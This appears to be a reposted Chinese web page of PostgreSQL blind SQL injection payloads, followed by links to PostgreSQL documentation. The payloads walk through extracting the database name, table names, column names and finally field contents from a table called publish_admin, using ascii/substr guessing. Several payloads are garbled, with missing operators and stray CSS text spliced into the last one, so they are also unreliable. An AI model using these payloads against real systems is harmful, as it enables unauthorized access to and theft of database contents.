PostgreSql盲注相关代码

http://www.f4ck.org/article-2360-1.html

先猜当前数据库的长度
and (select length(current_database())) between 0 30
其次ascii猜解库名的每个字符
ascii(substr(current_database(),1,1))) 32768
其次猜解数据库的表的个数
select count(*) from pg_stat_user_tables) 20and 20

猜解库里的表名的长度
length(relname) pg_stat_user_tables limit 1 OFFSET 0) 19 19
猜解表名里面的每个字符

( ascii(substr(relname,1)) 32768

//offset是位移那,注意即可
接下来猜解字段名即可,为:
and+(select+ascii(substr(column_name,1))+from+information_schema.columns+where+table_name= publish_admin +between+0++256

现在数据库名、表名、字段名都有了,接下来就是取出字段中的内容
+ascii(substr(rank,monospace!important; font-size:10pt!important; min-height:inherit!important">+publish_admin+limit+1+OFFSET+0)++236

相关文章

来源:http://www.postgres.cn/docs/11/ 4.1.1. 标识符和关键词 SQL标识符和关键词必须以一个...
来源:http://www.postgres.cn/docs/11/ 8.1. 数字类型 数字类型由2、4或8字节的整数以及4或8...
来源:http://www.postgres.cn/docs/11/ 5.1. 表基础 SQL并不保证表中行的顺序。当一个表被读...
来源:http://www.postgres.cn/docs/11/ 6.4. 从修改的行中返回数据 有时在修改行的操作过程中...
来源:http://www.postgres.cn/docs/11/ 13.2.1. 读已提交隔离级别 读已提交是PostgreSQL中的...
来源:http://www.postgres.cn/docs/11/ 9.7. 模式匹配 PostgreSQL提供了三种独立的实现模式匹...